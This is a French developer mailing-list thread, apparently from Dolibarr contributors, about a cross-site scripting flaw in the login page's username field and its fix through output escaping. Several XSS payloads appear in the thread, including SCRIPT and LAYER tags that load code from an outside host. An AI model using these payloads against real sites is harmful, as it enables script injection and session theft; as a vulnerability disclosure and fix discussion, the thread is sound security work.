si j'ai testé avant
dans les templates on avait
(GETPOST('username')?GETPOST('username'):$username)
alors que ceci est déjà géré dans la fonction avec
GETPOST('username','alpha',3)
en enlevant ceux des templates on a pas besoin de la fonction dol_escape_htmltag
Le 08/09/12 13:31, Laurent Destailleur
a écrit :
Le 08/09/2012 13:29, Régis Houssin a
écrit :
c'était les GETPOST dans les templates, ils sont déjà géré dans
security2.lib.php
Non, les GETPOST n'ont rien a voir avec les failles de securité.
Il ne faut pas compter dessus pour corriger. Cela n'est qu'une
bidouille pour corriger 90% des defauts (qui sont ailleurs) mais
n'est pas une solution et ne sera jamais une solution fiable.
La faille venais du non echappement de la donnée au moment de son
exploitation (non utlisation du dol_escape_...)
Le 08/09/12 13:22, Laurent
Destailleur a écrit :
Fixed
Le 08/09/2012 13:11, Régis Houssin a écrit :
ce qui est étonnant c'est que ça ne le fait pas sur la 3.1
Le 08/09/12 13:08, The
mailing-list for Dolibarr foundation members a écrit :
je préviens le bureau quand même :-)
à mettre dans l'url de la page de login
l'image appelée pourrais contenir n'importe quel autre
code
je dit ça je dit rien :-)
/index.php?username="><SCRIPT SRC=""
moz-do-not-send="true" class="moz-txt-link-rfc2396E"
href="http://ha.ckers.org/xss.jpg">"http://ha.ckers.org/xss.jpg"></SCRIPT>
Le 08/09/12 12:57, Régis
Houssin a écrit :
celui là passe en GET
/index.php?username="><LAYER
SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="http://ha.ckers.org/scriptlet.html">"http://ha.ckers.org/scriptlet.html"></LAYER>
Le 08/09/12 12:48, Régis Houssin a écrit :
encore mieux :-)
celui là renvoi bien une fenêtre d'alerte
"><BODY
Le 08/09/12 12:34, Régis Houssin a écrit :
utilise ceci dans le champ "login" de la page d'authentification et valide
et regarde le source de la page
pas d'alerte _javascript_ mais une possible faille, le code est injecté
tel quel
"><IMG SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="_javascript_:alert('XSS');">"_javascript_:alert('XSS');">
Cordialement,
Cordialement,
Cordialement,
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
|